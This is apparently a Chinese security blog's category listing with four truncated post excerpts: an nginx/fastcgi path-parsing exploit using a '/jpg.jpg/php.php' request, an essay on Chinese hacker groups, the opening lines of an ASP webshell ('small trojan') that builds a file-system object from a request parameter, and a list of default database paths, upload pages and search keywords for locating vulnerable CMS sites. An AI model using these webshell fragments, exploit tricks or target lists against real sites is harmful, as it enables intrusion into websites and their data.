分类: Wooyun

65 篇文章

nginx解析漏洞利用
那么假设存在一个http://www.target.com/jpg.jpg,我们以如下的方式去访问 http://www.target.com/jpg.jpg/php.php 将会得到一个URL /jpg.jpg/php.php 经过location指令,该请求将会交给后端的fastcgi处理,nginx为其设置环境变量SCRIPT_FILENAME,内容为 /scripts/jpg.jpg/ph…
中国黑客江湖之八大门派
1、安全焦点 门派代表:冰河 除了绿色兵团鼎盛时期,很少有门派能汇聚那么多的高手。武林双鹰、冰河、wolf,flashsky、tombkeeper、isno、 eyas,均是当今武林响当当的人物。每次的安全焦点的年会,参加的都是中国黑客武林绝顶的高手,还有很多神秘的绝顶高手一直不为外界所知,安全焦点的门派实力到底去到什么程度,武林中一直是一个迷。当今黑客武林,安全焦点的震慑力无人能出其右,中国黑客…
一款ASP精巧小马
<%on error resume next%> <%ofso="scripting.filesystemobject"%> <%set fso=server.createobject(ofso)%> <%path=request("path")%> <%if path<>"&quo…
默认漏洞关键字整理
默认数据库: Databases/myszw.mdb、Databases/myszw1.mdb 上传:upload_Photo.asp?PhotoUrlID=3、upload_Photo.asp?PhotoUrlID=1 关键字:网站建设公司企业网站管理系统 后缀:admin/login.asp 关键字:网梦购物系统 gCS<iBT   7 工具:挖掘鸡 后缀:/admin/login.as…